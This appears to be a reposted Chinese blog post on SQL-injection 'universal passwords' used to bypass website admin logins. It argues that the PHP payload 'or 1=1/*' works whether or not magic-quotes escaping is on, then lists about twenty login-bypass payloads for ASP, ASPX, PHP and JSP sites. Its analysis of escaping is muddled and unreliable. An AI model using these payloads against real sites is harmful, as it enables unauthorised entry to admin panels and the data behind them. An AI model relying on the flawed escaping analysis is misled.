---恢復內容開始---
說實話如果一個網站的前台都是注入漏洞,那么憑經驗,萬能密碼進后台的幾率基本上是
百分之百。
可是有的人說對PHP的站如果是GPC魔術轉換開啟,就會對特殊符號轉義,就徹底杜絕了
PHP注入。
其實說這話的人沒有好好想過,更沒有嘗試過用萬能密碼進PHP的后台。
其實GPC魔術轉換是否開啟對用萬能密碼進后台一點影響也沒有。
如果你用這樣的萬能密碼‘or'='or’,當然進不去,理由是GPC開啟的時候單引號會被轉換。
PHP注入時我常用的萬能密碼是:‘or 1=1/*.
那我們分析一下為什么這可以進后台。
如果sql語句這樣寫:“SELECT * FROM admin where name=’”.$_POST['name'].“‘and
password=’”.$_POST['password'].“‘”,那我們在帳號處輸入萬能密碼'or 1=1/*,密碼隨便輸,sql
語句就成了select * from admin where name=''or 1=1/*' and password=’任意字符‘。
/*為mysql的注釋符,這樣后面的東西就都被注釋掉了,也就是為什么密碼隨便輸的原因。
假設GPC轉換沒有開啟,那么請看:where name=''or 1=1(*/后面的東西被注釋掉了),
name='’的邏輯值為假,而后面的1=1邏輯值則為真,對於整體就成了假 or 真,最終的邏輯值
還是真,就進后台了。
那么如果GPC轉換開啟了,就對單引號進行了轉換。語句就變成了where name='\'or 1=1,在
看一下和剛才有什么區別,無非是多了個\。name='\‘與name='’的邏輯值一樣,都為假,那1=1
為真,總的sql語句的邏輯值不還是真嗎?那有進不去后台的理由嗎?
所以總的來說,php網站的萬能密碼可以這樣寫:‘or 1=1/*,而GPC轉換是否開啟對它沒有任
何影響!
所以請改變你的想法:存在字符型注入的php網站是可以用萬能密碼'or 1=1/*的
---恢復內容結束---
下面附一個萬能密碼合輯
asp aspx萬能密碼
1:”or “a”=”a
2: ‘)or(‘a’=’a
3:or 1=1–
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a’=’a
8:”or”=”a’=’a
9:’or”=’
10:’or’=’or’
11: 1 or ‘1’=’1’=1
12: 1 or ‘1’=’1’ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 用戶名 ’ UNION Select 1,1,1 FROM admin Where ”=’ (替換表名admin)
密碼 1
17..admin’ or ‘a’=’a 密碼隨便
PHP萬能密碼
‘or 1=1/*
User: something
Pass: ’ OR ‘1’=’1
jsp 萬能密碼
1’or’1’=’1
admin’ OR 1=1/*
————————————————